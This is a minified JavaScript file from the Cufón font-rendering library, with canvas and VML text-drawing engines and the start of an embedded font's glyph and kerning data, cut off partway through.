N=M.CSS={Size:function(c,b){this.value=parseFloat(c);this.unit=String(c).match(/[a-z%]*$/)[0]||"px";this.convert=function(d){return d/b*this.value};this.convertFrom=function(d){return d/this.value*b};this.toString=function(){return this.value+this.unit}},addClass:function(c,b){var d=c.className;c.className=d+(d&&" ")+b;return c},color:J(function(c){var b={};b.color=c.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(e,d,f){b.opacity=parseFloat(f);return"rgb("+d+")"});return b}),fontStretch:J(function(b){if(typeof b=="number"){return b}if(/%$/.test(b)){return parseFloat(b)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[b]||1}),getStyle:function(c){var b=document.defaultView;if(b&&b.getComputedStyle){return new A(b.getComputedStyle(c,null))}if(c.currentStyle){return new A(c.currentStyle)}return new A(c.style)},gradient:J(function(f){var g={id:f,type:f.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},c=f.substr(f.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var e=0,b=c.length,d;e<b;++e){d=c[e].split("=",2).reverse();g.stops.push([d[1]||e/(b-1),d[0]])}return g}),quotedList:J(function(e){var d=[],c=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,b;while(b=c.exec(e)){d.push(b[3]||b[1])}return d}),recognizesMedia:J(function(h){var f=document.createElement("style"),d,c,b;f.type="text/css";f.media=h;try{f.appendChild(document.createTextNode("/**/"))}catch(g){}c=G("head")[0];c.insertBefore(f,c.firstChild);d=(f.sheet||f.styleSheet);b=d&&!d.disabled;c.removeChild(f);return b}),removeClass:function(d,c){var b=RegExp("(?:^|\\s+)"+c+"(?=\\s|$)","g");d.className=d.className.replace(b,"");return d},supports:function(d,c){var b=document.createElement("span").style;if(b[d]===undefined){return false}b[d]=c;return b[d]===c},textAlign:function(e,d,b,c){if(d.get("textAlign")=="right"){if(b>0){e=" "+e}}else{if(b<c-1){e+=" "}}return e},textDecoration:function(g,f){if(!f){f=this.getStyle(g)}var c={underline:null,overline:null,"line-through":null};for(var b=g;b.parentNode&&b.parentNode.nodeType==1;){var e=true;for(var d in c){if(!K(c,d)||c[d]){continue}if(f.get("textDecoration").indexOf(d)!=-1){c[d]=f.get("color")}e=false}if(e){break}f=this.getStyle(b=b.parentNode)}return c},textShadow:J(function(f){if(f=="none"){return null}var e=[],g={},b,c=0;var d=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(b=d.exec(f)){if(b[0]==","){e.push(g);g={};c=0}else{if(b[1]){g.color=b[1]}else{g[["offX","offY","blur"][c++]]=b[2]}}}e.push(g);return e}),textTransform:(function(){var b={uppercase:function(c){return c.toUpperCase()},lowercase:function(c){return c.toLowerCase()},capitalize:function(c){return c.replace(/\b./g,function(d){return d.toUpperCase()})}};return function(e,d){var c=b[d.get("textTransform")];return c?c(e):e}})(),whiteSpace:(function(){var b={inline:1,"inline-block":1,"run-in":1};return function(e,c,d){if(b[c.get("display")]){return e}if(!d.previousSibling){e=e.replace(/^\s+/,"")}if(!d.nextSibling){e=e.replace(/\s+$/,"")}return e}})()};N.ready=(function(){var b=!N.recognizesMedia("all"),e=false;var d=[],h=function(){b=true;for(var k;k=d.shift();k()){}};var i=G("link"),j=G("style");function c(k){return k.disabled||g(k.sheet,k.media||"screen")}function g(n,q){if(!N.recognizesMedia(q||"all")){return true}if(!n||n.disabled){return false}try{var r=n.cssRules,p;if(r){search:for(var m=0,k=r.length;p=r[m],m<k;++m){switch(p.type){case 2:break;case 3:if(!g(p.styleSheet,p.media.mediaText)){return false}break;default:break search}}}}catch(o){}return true}function f(){if(document.createStyleSheet){return true}var l,k;for(k=0;l=i[k];++k){if(l.rel.toLowerCase()=="stylesheet"&&!c(l)){return false}}for(k=0;l=j[k];++k){if(!c(l)){return false}}return true}X.ready(function(){if(!e){e=N.getStyle(document.body).isUsable()}if(b||(e&&f())){h()}else{setTimeout(arguments.callee,10)}});return function(k){if(b){k()}else{d.push(k)}}})();function S(c){var b=this.face=c.face;this.glyphs=c.glyphs;this.w=c.w;this.baseSize=parseInt(b["units-per-em"],10);this.family=b["font-family"].toLowerCase();this.weight=b["font-weight"];this.style=b["font-style"]||"normal";this.viewBox=(function(){var e=b.bbox.split(/\s+/);var d={minX:parseInt(e[0],10),minY:parseInt(e[1],10),maxX:parseInt(e[2],10),maxY:parseInt(e[3],10)};d.width=d.maxX-d.minX;d.height=d.maxY-d.minY;d.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return d})();this.ascent=-parseInt(b.ascent,10);this.descent=-parseInt(b.descent,10);this.height=-this.ascent+this.descent}function F(){var c={},b={oblique:"italic",italic:"oblique"};this.add=function(d){(c[d.style]||(c[d.style]={}))[d.weight]=d};this.get=function(h,i){var g=c[h]||c[b[h]]||c.normal||c.italic||c.oblique;if(!g){return null}i={normal:400,bold:700}[i]||parseInt(i,10);if(g[i]){return g[i]}var e={1:1,99:0}[i%100],k=[],f,d;if(e===undefined){e=i>400}if(i==500){i=400}for(var j in g){if(!K(g,j)){continue}j=parseInt(j,10);if(!f||j<f){f=j}if(!d||j>d){d=j}k.push(j)}if(i<f){i=f}if(i>d){i=d}k.sort(function(m,l){return(e?(m>i&&l>i)?m<l:m>l:(m<i&&l<i)?m>l:m<l)?-1:1});return g[k[0]]}}function R(){function d(f,g){if(f.contains){return f.contains(g)}return f.compareDocumentPosition(g)&16}function b(g){var f=g.relatedTarget;if(!f||d(this,f)){return}c(this)}function e(f){c(this)}function c(f){setTimeout(function(){M.replace(f,D.get(f).options,true)},10)}this.attach=function(f){if(f.onmouseenter===undefined){Q(f,"mouseover",b);Q(f,"mouseout",b)}else{Q(f,"mouseenter",e);Q(f,"mouseleave",e)}}}function U(){var c=[],d={};function b(h){var e=[],g;for(var f=0;g=h[f];++f){e[f]=c[d[g]]}return e}this.add=function(f,e){d[f]=c.push(e)-1};this.repeat=function(){var e=arguments.length?b(arguments):c,f;for(var g=0;f=e[g++];){M.replace(f[0],f[1],true)}}}function a(){var d={},b=0;function c(e){return e.cufid||(e.cufid=++b)}this.get=function(e){var f=c(e);return d[f]||(d[f]={})}}function A(b){var d={},c={};this.extend=function(e){for(var f in e){if(K(e,f)){d[f]=e[f]}}return this};this.get=function(e){return d[e]!=undefined?d[e]:b[e]};this.getSize=function(f,e){return c[f]||(c[f]=new N.Size(this.get(f),e))};this.isUsable=function(){return!!b}}function Q(c,b,d){if(c.addEventListener){c.addEventListener(b,d,false)}else{if(c.attachEvent){c.attachEvent("on"+b,function(){return d.call(c,window.event)})}}}function V(c,b){var d=D.get(c);if(d.options){return c}if(b.hover&&b.hoverables[c.nodeName.toLowerCase()]){B.attach(c)}d.options=b;return c}function J(b){var c={};return function(d){if(!K(c,d)){c[d]=b.apply(null,arguments)}return c[d]}}function C(g,f){if(!f){f=N.getStyle(g)}var c=N.quotedList(f.get("fontFamily").toLowerCase()),e;for(var d=0,b=c.length;d<b;++d){e=c[d];if(I[e]){return I[e].get(f.get("fontStyle"),f.get("fontWeight"))}}return null}function G(b){return document.getElementsByTagName(b)}function K(c,b){return c.hasOwnProperty(b)}function H(){var b={},d,f;for(var e=0,c=arguments.length;d=arguments[e],e<c;++e){for(f in d){if(K(d,f)){b[f]=d[f]}}}return b}function O(e,o,c,p,f,d){var n=p.separate;if(n=="none"){return Z[p.engine].apply(null,arguments)}var m=document.createDocumentFragment(),h;var j=o.split(P[n]),b=(n=="words");if(b&&T){if(/^\s/.test(o)){j.unshift("")}if(/\s$/.test(o)){j.push("")}}for(var k=0,g=j.length;k<g;++k){h=Z[p.engine](e,b?N.textAlign(j[k],c,k,g):j[k],c,p,f,d,k<g-1);if(h){m.appendChild(h)}}return m}function L(c,k){var d,b,e,h,g,j;for(e=V(c,k).firstChild;e;e=g){h=e.nodeType;g=e.nextSibling;j=false;if(h==1){if(!e.firstChild){continue}if(!/cufon/.test(e.className)){arguments.callee(e,k);continue}else{j=true}}else{if(h!=3){continue}}if(!b){b=N.getStyle(c).extend(k)}if(!d){d=C(c,b)}if(!d){continue}if(j){Z[k.engine](d,null,b,k,e,c);continue}var i=N.whiteSpace(e.data,b,e);if(i===""){continue}var f=O(d,i,b,k,e,c);if(f){e.parentNode.replaceChild(f,e)}else{e.parentNode.removeChild(e)}}}var T=" ".split(/\s+/).length==0;var D=new a();var B=new R();var Y=new U();var E=false;var Z={},I={},W={enableTextDecoration:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},printable:true,selector:(window.Sizzle||(window.jQuery&&function(b){return jQuery(b)})||(window.dojo&&dojo.query)||(window.$$&&function(b){return $$(b)})||(window.$&&function(b){return $(b)})||(document.querySelectorAll&&function(b){return document.querySelectorAll(b)})||(window.Ext&&Ext.query)||G),separate:"words",textShadow:"none"};var P={words:/[^\S\u00a0]+/,characters:""};M.now=function(){X.ready();return M};M.refresh=function(){Y.repeat.apply(Y,arguments);return M};M.registerEngine=function(c,b){if(!b){return M}Z[c]=b;return M.set("engine",c)};M.registerFont=function(d){var b=new S(d),c=b.family;if(!I[c]){I[c]=new F()}I[c].add(b);return M.set("fontFamily",'"'+c+'"')};M.replace=function(d,c,b){c=H(W,c);if(!c.engine){return M}if(!E){N.addClass(X.root(),"cufon-active cufon-loading");N.ready(function(){N.removeClass(X.root(),"cufon-loading")});E=true}if(c.hover){c.forceHitArea=true}if(typeof c.textShadow=="string"){c.textShadow=N.textShadow(c.textShadow)}if(typeof c.color=="string"&&/^-/.test(c.color)){c.textGradient=N.gradient(c.color)}if(!b){Y.add(d,arguments)}if(d.nodeType||typeof d=="string"){d=[d]}N.ready(function(){for(var f=0,e=d.length;f<e;++f){var g=d[f];if(typeof g=="string"){M.replace(c.selector(g),c,true)}else{L(g,c)}}});return M};M.set=function(b,c){W[b]=c;return M};return M})();Cufon.registerEngine("canvas",(function(){var B=document.createElement("canvas");if(!B||!B.getContext||!B.getContext.apply){return}B=null;var A=Cufon.CSS.supports("display","inline-block");var E=!A&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var F=document.createElement("style");F.type="text/css";F.appendChild(document.createTextNode((".cufon-canvas{text-indent:0;}@media screen,projection{.cufon-canvas{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(E?"":"font-size:1px;line-height:1px;")+"}.cufon-canvas .cufon-alt{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(A?".cufon-canvas canvas{position:relative;}":".cufon-canvas canvas{position:absolute;}")+"}@media print{.cufon-canvas{padding:0;}.cufon-canvas canvas{display:none;}.cufon-canvas .cufon-alt{display:inline;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(F);function D(O,H){var M=0,L=0;var G=[],N=/([mrvxe])([^a-z]*)/g,J;generate:for(var I=0;J=N.exec(O);++I){var K=J[2].split(",");switch(J[1]){case"v":G[I]={m:"bezierCurveTo",a:[M+~~K[0],L+~~K[1],M+~~K[2],L+~~K[3],M+=~~K[4],L+=~~K[5]]};break;case"r":G[I]={m:"lineTo",a:[M+=~~K[0],L+=~~K[1]]};break;case"m":G[I]={m:"moveTo",a:[M=~~K[0],L=~~K[1]]};break;case"x":G[I]={m:"closePath"};break;case"e":break generate}H[G[I].m].apply(H,G[I].a)}return G}function C(K,J){for(var I=0,H=K.length;I<H;++I){var G=K[I];J[G.m].apply(J,G.a)}}return function(AH,a,z,W,e,AI){var I=(a===null);if(I){a=e.alt}var c=AH.viewBox;var K=z.getSize("fontSize",AH.baseSize);var v=z.get("letterSpacing");v=(v=="normal")?0:K.convertFrom(parseInt(v,10));var d=0,w=0,u=0,Y=0;var b=W.textShadow,s=[];if(b){for(var AG=b.length;AG--;){var m=b[AG];var r=K.convertFrom(parseFloat(m.offX));var p=K.convertFrom(parseFloat(m.offY));s[AG]=[r,p];if(p<d){d=p}if(r>w){w=r}if(p>u){u=p}if(r<Y){Y=r}}}var AL=Cufon.CSS.textTransform(a,z).split(""),U;var J=AH.glyphs,X,M,AC;var G=0,Q,h=[];for(var AG=0,AE=0,AB=AL.length;AG<AB;++AG){X=J[U=AL[AG]]||AH.missingGlyph;if(!X){continue}if(M){G-=AC=M[U]||0;h[AE-1]-=AC}G+=Q=h[AE++]=~~(X.w||AH.w)+v;M=X.k}if(Q===undefined){return null}w+=c.width-Q;Y+=c.minX;var V,L;if(I){V=e;L=e.firstChild}else{V=document.createElement("span");V.className="cufon cufon-canvas";V.alt=a;L=document.createElement("canvas");V.appendChild(L);if(W.printable){var AD=document.createElement("span");AD.className="cufon-alt";AD.appendChild(document.createTextNode(a));V.appendChild(AD)}}var AM=V.style;var o=L.style;var H=K.convert(c.height);var AK=Math.ceil(H);var t=AK/H;var n=t*Cufon.CSS.fontStretch(z.get("fontStretch"));var q=G*n;var AA=Math.ceil(K.convert(q+w-Y));var O=Math.ceil(K.convert(c.height-d+u));L.width=AA;L.height=O;o.width=AA+"px";o.height=O+"px";d+=c.minY;o.top=Math.round(K.convert(d-AH.ascent))+"px";o.left=Math.round(K.convert(Y))+"px";var T=Math.ceil(K.convert(q))+"px";if(A){AM.width=T;AM.height=K.convert(AH.height)+"px"}else{AM.paddingLeft=T;AM.paddingBottom=(K.convert(AH.height)-1)+"px"}var AJ=L.getContext("2d"),f=H/c.height;AJ.scale(f,f*t);AJ.translate(-Y,-d);AJ.lineWidth=AH.face["underline-thickness"];AJ.save();function N(i,g){AJ.strokeStyle=g;AJ.beginPath();AJ.moveTo(0,i);AJ.lineTo(G,i);AJ.stroke()}var P=W.enableTextDecoration?Cufon.CSS.textDecoration(AI,z):{};if(P.underline){N(-AH.face["underline-position"],P.underline)}if(P.overline){N(AH.ascent,P.overline)}function AF(){AJ.scale(n,1);for(var x=0,k=0,g=AL.length;x<g;++x){var y=J[AL[x]]||AH.missingGlyph;if(!y){continue}if(y.d){AJ.beginPath();if(y.code){C(y.code,AJ)}else{y.code=D("m"+y.d,AJ)}AJ.fill()}AJ.translate(h[k++],0)}AJ.restore()}if(b){for(var AG=b.length;AG--;){var m=b[AG];AJ.save();AJ.fillStyle=m.color;AJ.translate.apply(AJ,s[AG]);AF()}}var S=W.textGradient;if(S){var Z=S.stops,R=AJ.createLinearGradient(0,c.minY,0,c.maxY);for(var AG=0,AB=Z.length;AG<AB;++AG){R.addColorStop.apply(R,Z[AG])}AJ.fillStyle=R}else{AJ.fillStyle=z.get("color")}AF();if(P["line-through"]){N(-AH.descent,P["line-through"])}return V}})());Cufon.registerEngine("vml",(function(){if(!document.namespaces){return}if(document.namespaces.cvml==null){document.namespaces.add("cvml","urn:schemas-microsoft-com:vml")}var B=document.createElement("cvml:shape");B.style.behavior="url(#default#VML)";if(!B.coordsize){return}B=null;var F=(document.documentMode||0)<8;document.write(('<style type="text/css">.cufon-vml-canvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:rect,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}.cufon-vml-canvas{position:absolute;text-align:left;}.cufon-vml{display:inline-block;position:relative;vertical-align:'+(F?"middle":"text-bottom")+";}.cufon-vml .cufon-alt{position:absolute;left:-10000in;font-size:1px;}a .cufon-vml{cursor:pointer}}@media print{.cufon-vml *{display:none;}.cufon-vml .cufon-alt{display:inline;}}</style>").replace(/;/g,"!important;"));function C(G,H){return A(G,/(?:em|ex|%)$|^[a-z-]+$/i.test(H)?"1em":H)}function A(J,K){if(/px$/i.test(K)){return parseFloat(K)}var I=J.style.left,H=J.runtimeStyle.left;J.runtimeStyle.left=J.currentStyle.left;J.style.left=K.replace("%","em");var G=J.style.pixelLeft;J.style.left=I;J.runtimeStyle.left=H;return G}var E={};function D(L){var M=L.id;if(!E[M]){var J=L.stops,K=document.createElement("cvml:fill"),G=[];K.type="gradient";K.angle=180;K.focus="0";K.method="sigma";K.color=J[0][1];for(var I=1,H=J.length-1;I<H;++I){G.push(J[I][0]*100+"% "+J[I][1])}K.colors=G.join(",");K.color2=J[H][1];E[M]=K}return E[M]}return function(AI,f,AC,b,n,AJ,AA){var J=(f===null);if(J){f=n.alt}var h=AI.viewBox;var L=AC.computedFontSize||(AC.computedFontSize=new Cufon.CSS.Size(C(AJ,AC.get("fontSize"))+"px",AI.baseSize));var z=AC.computedLSpacing;if(z==undefined){z=AC.get("letterSpacing");AC.computedLSpacing=z=(z=="normal")?0:~~L.convertFrom(A(AJ,z))}var X,M;if(J){X=n;M=n.firstChild}else{X=document.createElement("span");X.className="cufon cufon-vml";X.alt=f;M=document.createElement("span");M.className="cufon-vml-canvas";X.appendChild(M);if(b.printable){var AF=document.createElement("span");AF.className="cufon-alt";AF.appendChild(document.createTextNode(f));X.appendChild(AF)}if(!AA){X.appendChild(document.createElement("cvml:shape"))}}var AO=X.style;var u=M.style;var H=L.convert(h.height),AL=Math.ceil(H);var y=AL/H;var s=y*Cufon.CSS.fontStretch(AC.get("fontStretch"));var x=h.minX,w=h.minY;u.height=AL;u.top=Math.round(L.convert(w-AI.ascent));u.left=Math.round(L.convert(x));AO.height=L.convert(AI.height)+"px";var Q=b.enableTextDecoration?Cufon.CSS.textDecoration(AJ,AC):{};var e=AC.get("color");var AN=Cufon.CSS.textTransform(f,AC).split(""),W;var K=AI.glyphs,c,N,AE;var G=0,o=[],v=0,S;var U,g=b.textShadow;for(var AH=0,AG=0,AD=AN.length;AH<AD;++AH){c=K[W=AN[AH]]||AI.missingGlyph;if(!c){continue}if(N){G-=AE=N[W]||0;o[AG-1]-=AE}G+=S=o[AG++]=~~(c.w||AI.w)+z;N=c.k}if(S===undefined){return null}var V=-x+G+(h.width-S);var AM=L.convert(V*s),AB=Math.round(AM);var r=V+","+h.height,I;var m="r"+r+"ns";var T=b.textGradient&&D(b.textGradient);for(AH=0,AG=0;AH<AD;++AH){c=K[AN[AH]]||AI.missingGlyph;if(!c){continue}if(J){U=M.childNodes[AG];while(U.firstChild){U.removeChild(U.firstChild)}}else{U=document.createElement("cvml:shape");M.appendChild(U)}U.stroked="f";U.coordsize=r;U.coordorigin=I=(x-v)+","+w;U.path=(c.d?"m"+c.d+"xe":"")+"m"+I+m;U.fillcolor=e;if(T){U.appendChild(T.cloneNode(false))}var AK=U.style;AK.width=AB;AK.height=AL;if(g){var P=g[0],O=g[1];var a=Cufon.CSS.color(P.color),Y;var q=document.createElement("cvml:shadow");q.on="t";q.color=a.color;q.offset=P.offX+","+P.offY;if(O){Y=Cufon.CSS.color(O.color);q.type="double";q.color2=Y.color;q.offset2=O.offX+","+O.offY}q.opacity=a.opacity||(Y&&Y.opacity)||1;U.appendChild(q)}v+=o[AG++]}var p=U.nextSibling,R,Z;if(b.forceHitArea){if(!p){p=document.createElement("cvml:rect");p.stroked="f";p.className="cufon-vml-cover";R=document.createElement("cvml:fill");R.opacity=0;p.appendChild(R);M.appendChild(p)}Z=p.style;Z.width=AB;Z.height=AL}else{if(p){M.removeChild(p)}}AO.width=Math.max(Math.ceil(L.convert(G*s)),0);if(F){var t=AC.computedYAdjust;if(t===undefined){var d=AC.get("lineHeight");if(d=="normal"){d="1em"}else{if(!isNaN(d)){d+="em"}}AC.computedYAdjust=t=0.5*(A(AJ,d)-parseFloat(AO.height))}if(t){AO.marginTop=Math.ceil(t)+"px";AO.marginBottom=t+"px"}}return X}})());Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"48,-246r0,246r-19,0r0,-246r19,0","w":77},{"d":"42,-162r0,162r-17,0r0,-162r17,0xm94,-244r-54,56r-12,0r37,-56r29,0","w":67},{"d":"155,-246r0,16r-107,0r0,94r96,0r0,15r-96,0r0,121r-19,0r0,-246r126,0","w":162,"k":{"T":-7,"\u0164":-7,"A":21,"\u00c1":21,",":50,".":50,"o":5,"e":5,"\u00e9":5,"\u011b":5,"\u00f3":5,")":-11,"]":-11,"}":-11}},{"d":"105,-5v-41,18,-70,6,-70,-43r0,-99r-44,0r0,-15r44,0v1,-23,-5,-51,17,-53r0,53r45,0r0,15r-45,0r0,99v-7,42,31,37,53,26r0,17","w":109,"k":{"j":-7,"o":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"e":4,"q":4,"\u00e9":4,"\u011b":4,"\u00f3":4,"a":-7,"\u00e1":-7,"s":-2,"\u0161":-2,"x":-4,"z":-7,"\u017e":-7,"b":-4,"*":-11}},{"d":"48,-246r0,246r-19,0r0,-246r19,0xm54,-308r44,0r-71,46r-17,0","w":77},{"d":"136,-86v10,-76,-80,-75,-96,-27r0,113r-18,0r0,-162r18,0r0,28v8,-10,22,-31,53,-31v39,0,61,36,61,78r0,87r-18,0r0,-86","w":176,"k":{"y":5,"\u00fd":5,"v":5,"w":5,"u":4,"\u016f":4}},{"d":"42,-246r0,30r-17,0r0,-30r17,0xm42,-162r0,162r-17,0r0,-162r17,0","w":67},{"d":"255,-162r-70,165r-8,0r-50,-131r-50,131r-8,0r-69,-165r17,0r55,132r51,-132r9,0r49,132r57,-132r17,0","w":254,"k":{"g":5,",":22,".":22,"o":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"e":7,"q":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"f":-7,"*":-18}},{"d":"230,-228r0,22v-77,-51,-195,-24,-195,84v0,98,100,130,180,92r0,-66r-52,0r0,-16r71,0r0,94v-94,49,-220,11,-220,-105v0,-70,53,-126,131,-126v37,0,65,12,85,21","w":252,"k":{"B":4}},{"d":"210,-246r-96,114r0,132r-19,0r0,-132r-95,-114r23,0r82,98r82,-98r23,0xm131,-308r44,0r-71,46r-17,0","w":209,"k":{"g":41,"p":31,"y":18,"\u00fd":18,"A":40,"\u00c1":40,"C":22,"\u010c":22,"G":22,"O":22,"S":7,"\u0160":7,"v":18,"w":18,"Q":22,":":11,";":11,",":36,".":36,"o":50,"c":50,"\u010d":50,"d":50,"\u010f":50,"e":50,"q":50,"\u00e9":40,"\u011b":40,"\u00f3":50,")":-14,"]":-14,"}":-14,"u":32,"\u016f":32,"r":31,"\u0159":31,"t":32,"\u0165":32,"a":43,"\u00e1":22,"-":54,"m":31,"n":31,"\u0148":27,"s":35,"\u0161":35,"x":15,"z":21,"\u017e":21,"i":14,"\u00ed":14}},{"d":"125,-247r114,247r-20,0r-39,-85r-120,0r-39,85r-20,0r113,-247r11,0xm172,-101r-52,-115r-53,115r105,0","w":240,"k":{"y":23,"\u00fd":23,"T":36,"\u0164":36,"V":29,"W":29,"Y":40,"\u00dd":40,"C":14,"\u010c":14,"G":14,"O":14,"S":-4,"\u0160":-4,"v":22,"w":22,"Q":14,"U":7,"\u00da":7,"\u016e":7,":":-14,";":-14,",":-14,".":-14,"o":11,"c":11,"\u010d":11,"d":11,"\u010f":11,"e":7,"q":11}},{"d":"229,-228r0,21v-19,-10,-47,-24,-84,-24v-66,0,-110,45,-110,108v0,64,46,108,109,108v40,0,73,-18,87,-25r0,20v-40,21,-74,23,-87,23v-67,0,-130,-46,-130,-125v0,-121,123,-153,215,-106","w":244,"k":{"A":-5,"\u00c1":-5,"S":-4,"\u0160":-4,",":-9,".":-9}},{"d":"164,-100v-24,0,-79,-33,-89,-29v-17,0,-31,9,-51,24r0,-19v19,-14,37,-21,51,-21v7,-6,82,33,88,28v17,0,33,-12,50,-24r0,20v-10,8,-29,21,-49,21","w":237},{"d":"139,-162r0,7r-107,139r107,0r0,16r-135,0r0,-5r107,-140r-101,0r0,-17r129,0xm83,-184r-22,0r-39,-59r14,0r36,40r35,-40r14,0","w":143,"k":{",":-7,".":-7,"o":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"e":7,"q":7,"t":-18,"\u0165":-18,"*":-22}},{"d":"372,-246r-98,248r-6,0r-83,-207r-81,207r-6,0r-98,-248r19,0r81,204r83,-204r6,0r81,204r82,-204r20,0","w":371,"k":{"g":24,"p":14,"y":9,"\u00fd":9,"A":29,"\u00c1":29,"C":14,"\u010c":14,"G":14,"O":14,"v":9,"w":9,"Q":14,",":36,".":36,"o":32,"c":32,"\u010d":32,"d":32,"\u010f":32,"e":32,"q":32,"\u00e9":25,"\u011b":25,"\u00f3":32,")":-14,"]":-14,"}":-14,"u":14,"\u016f":14,"r":14,"\u0159":14,"t":11,"\u0165":11,"a":22,"\u00e1":14,"-":36,"m":14,"n":18,"\u0148":14,"s":20,"\u0161":20}},{"d":"-2,27r184,0r0,18r-184,0r0,-18"},{"d":"150,-162r-121,245r-17,0r56,-114r-68,-131r18,0r59,113r55,-113r18,0xm134,-244r-55,56r-12,0r37,-56r30,0","w":147,"k":{"g":7,",":29,".":29,"o":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"e":7,"q":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"f":-7,"*":-18}},{"d":"30,83r0,-332r18,0r0,332r-18,0","w":78},{"d":"168,-162r-71,79r77,83r-22,0r-66,-71r-64,71r-20,0r74,-83r-74,-79r22,0r62,67r62,-67r20,0","w":172,"k":{"q":9,"*":-18,",":-4,".":-4,"o":9,"c":9,"\u010d":9,"d":9,"\u010f":9,"e":9,"\u00e9":9,"\u011b":9,"\u00f3":9}},{"d":"91,-148v-30,0,-42,14,-51,36r0,112r-17,0r0,-246r17,0r0,114v6,-10,20,-33,53,-33v39,0,61,34,61,81r0,84r-18,0v-4,-61,19,-148,-45,-148","w":176,"k":{"y":5,"\u00fd":5,"v":5,"w":5}},{"d":"242,-246r-106,120r112,126r-25,0r-99,-112r-100,112r-24,0r112,-126r-106,-120r24,0r94,106r94,-106r24,0","w":247,"k":{"v":25,"q":11,"Q":20,"y":25,"\u00fd":25,"C":20,"\u010c":20,"G":20,"O":20,"w":25,"o":11,"c":11,"\u010d":11,"d":11,"\u010f":11,"e":11,"\u00e9":11,"\u011b":11,"\u00f3":11,")":-7,"]":-7,"}":-7,"u":7,"\u016f":7}},{"d":"29,-246v73,-1,142,-4,144,64v0,30,-17,49,-47,60v14,9,20,18,77,105r12,17r-23,0v-25,-36,-45,-82,-77,-110v-14,-13,-42,-7,-67,-8r0,118r-19,0r0,-246xm152,-182v0,-47,-45,-50,-104,-48r0,96v56,2,104,1,104,-48","w":211,"k":{"y":18,"\u00fd":18,"T":25,"\u0164":25,"V":22,"W":20,"Y":25,"\u00dd":25,"Z":-11,"\u017d":-11,"C":14,"\u010c":14,"G":14,"O":14,"v":20,"w":20,"Q":14,"U":11,"\u00da":11,"\u016e":11,"o":13,"c":13,"\u010d":13,"d":14,"\u010f":14,"e":13,"q":13,"\u00e9":13,"\u011b":13,"\u00f3":13,"u":9,"\u016f":9}},{"d":"95,-165v50,0,82,38,82,84v0,53,-40,84,-82,84v-42,0,-82,-31,-82,-84v0,-45,31,-84,82,-84xm159,-81v-1,-89,-126,-92,-127,0v0,41,28,68,63,68v35,0,64,-27,64,-68","w":190,"k":{"y":7,"\u00fd":7,"v":7,"w":7,",":11,".":11,"x":9}},{"d":"250,-246r0,246r-16,0r-186,-216r0,216r-19,0r0,-246r17,0r185,215r0,-215r19,0","w":279},{"d":"130,-83v0,-53,-9,-56,-43,-65v-27,0,-41,23,-48,35r0,113r-17,0r0,-162r17,0r0,29v7,-11,21,-32,52,-32v37,0,48,29,52,39v35,-71,113,-38,113,39r0,87r-17,0v-3,-60,16,-146,-42,-148v-12,0,-36,7,-50,38r0,110r-17,0r0,-83","w":277,"k":{"v":5,"y":5,"\u00fd":5,"w":5,"u":4,"\u016f":4}},{"d":"150,-162r-121,245r-17,0r56,-114r-68,-131r18,0r59,113r55,-113r18,0","w":147,"k":{"g":7,",":29,".":29,"o":7,"c":7,"\u010d":7,"d":7,"\u010f":7,"e":7,"q":7,"\u00e9":7,"\u011b":7,"\u00f3":7,"f":-7,"*":-18}},{"d":"3,82v33,-28,70,-104,70,-166v0,-71,-34,-132,-70,-165r18,0v18,19,70,74,70,165v0,61,-37,135,-70,166r-18,0","w":119},{"d":"38,-71v-10,72,80,75,97,22r0,-113r17,0r0,162r-17,0r0,-27v-9,11,-25,30,-55,30v-38,0,-59,-34,-59,-74r0,-91r17,0r0,91","w":176},{"d":"231,-246r0,246r-19,0r0,-116r-164,0r0,116r-19,0r0,-246r19,0r0,114r164,0r0,-114r19,0","w":259},{"d":"87,-198v0,55,-72,92,-40,134r-6,5v-45,-42,27,-96,27,-141v0,-17,-11,-33,-27,-33v-21,-1,-21,18,-32,19r8,-28v30,-18,70,2,70,44xm54,-35r0,35r-23,0r0,-35r23,0","w":101},{"d":"14,-103v0,-61,67,-62,133,-59r0,15r-37,0v24,26,46,73,-24,98v-39,14,-38,4,-46,25v0,15,25,16,39,16v39,0,67,9,67,44v0,28,-25,47,-72,47v-71,0,-71,-39,-71,-43v0,-12,6,-34,47,-40v-44,-13,-27,-42,6,-50v-12,-4,-42,-15,-42,-53xm72,-147v-23,0,-43,19,-43,43v0,24,19,43,43,43v24,0,43,-19,43,-43v0,-24,-20,-43,-43,-43xm78,9v-38,2,-49,1,-59,30v11,52,111,29,111,-2v0,-28,-38,-28,-52,-28","w":150,"k":{"g":-7,"p":-7,"y":-7,"\u00fd":-7,"v":-7,"w":-7,"o":4,"\u00f3":4,")":-7,"]":-7,"}":-7,"a":-4,"\u00e1":-4,"x":-7,"z":-4,"\u017e":-4,"*":-22}},{"d":"39,-246r0,246r-18,0r0,-246r18,0xm153,-162r-88,77r103,85r-25,0r-102,-85r89,-77r23,0","w":158,"k":{",":-4,".":-4,"o":13,"c":13,"\u010d":13,"d":13,"\u010f":13,"e":13,"q":13,"\u00e9":11,"\u011b":11,"\u00f3":13,"t":-11,"\u0165":-11,"*":-7}},{"d":"134,-146r-10,16v-29,-33,-64,